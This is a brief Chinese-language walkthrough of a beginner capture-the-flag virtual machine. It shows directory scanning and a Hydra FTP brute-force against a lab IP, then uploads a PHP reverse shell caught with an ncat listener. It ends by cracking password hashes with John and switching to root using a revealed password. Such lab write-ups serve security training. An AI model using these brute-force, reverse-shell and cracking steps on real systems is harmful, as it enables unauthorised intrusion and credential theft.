描述
Google && Wikipedia是您的朋友
难度:容易
“当小猪知道公猪遭受了怎样的痛苦时,他们会如何尖叫”
请添加/ etc / hosts-> ip vm + armbjorn
推特:@ArmBjorn
在Virtualbox中工作。
获取root权限
目录
一、信息收集
1.nmap端口扫描
2.http服务目录扫描器
python3 dirsearch.py -u http://192.168.152.130 -e php
http://192.168.152.130/wordpress/
http://192.168.152.130//secret
二、漏洞利用
1.上面可能泄露了用户名账号。
下载secret,制作成密码字典
wget http://192.168.152.130/secret -O dir.txt
2.爆破21端口ftp服务
hydra -l ragnar -P dir.txt 192.168.152.130 ftp
三、getshell
1.登入ftp,上传php-reverse-shell
2.ncat 连接
ncat -lvp 1234
http://192.168.152.130/php-reverse-shell.php
四、提权
交互shell
python3 -c "import pty;pty.spawn('/bin/bash')"
su ragnar
寻找敏感文件
john 爆破密码
john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
john --show pass.txt
切换root用户
root/kevinmitnick
五、总结
- 爆破21端口ftp服务 hydra -l ragnar -P dir.txt 192.168.152.130 ftp
- john 爆破密码 john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt ; john --show pass.txt